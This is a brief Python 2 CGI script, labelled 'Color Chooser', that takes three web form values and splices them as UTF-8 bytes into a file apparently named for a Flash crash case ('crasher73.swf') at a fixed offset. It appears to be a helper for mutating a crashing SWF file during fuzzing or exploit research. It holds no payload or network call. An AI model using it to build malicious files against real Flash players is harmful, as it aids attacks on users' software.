1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

#!/usr/bin/python
import cgi, cgitb, os, sys

def toUnicode(n):
	# 1110xxxx 10xxxxxx 10xxxxxx
        if type(n) is str:
		n = int(n)
        p1 = n & 0x3f
	p2 = (n >> 6) & 0x3f
  	p3 = (n >> 12) & 0xf
	print p1, p3, p3

	return chr(p3 + 0xe0) + chr(p2 + 0x80) + chr(0x80 + p1)

cgitb.enable(); # formats errors in HTML
 
sys.stderr = sys.stdout
print "Content-type: text/html"
print
print '''<html>
<head>
<title>Make swf</title>
</head>
<body>
<h1>Color Chooser</h1>'''
arguments = cgi.FieldStorage()
a = 0
b = 0
c = 0

for i in arguments.keys():
 print arguments[i].name
 print arguments[i].value
 if (arguments[i].name == "a"):
	print "found a"
	a = arguments[i].value

 if (arguments[i].name == "b"):
	print "found b"
	b = arguments[i].value

 if (arguments[i].name == "c"):
	print "found c"
	c = arguments[i].value
 
print '''</body>
</html>'''

f = open("crasher73.swf", 'rb')
by = f.read();
head = by[:0x5e1]
tail = by[0x5e1+9:]
f.close()

f = open("new.swf", 'wb')
f.write(head)



f.write(toUnicode(c))
f.write(toUnicode(b))
f.write(toUnicode(a))

f.write(tail)

f.close()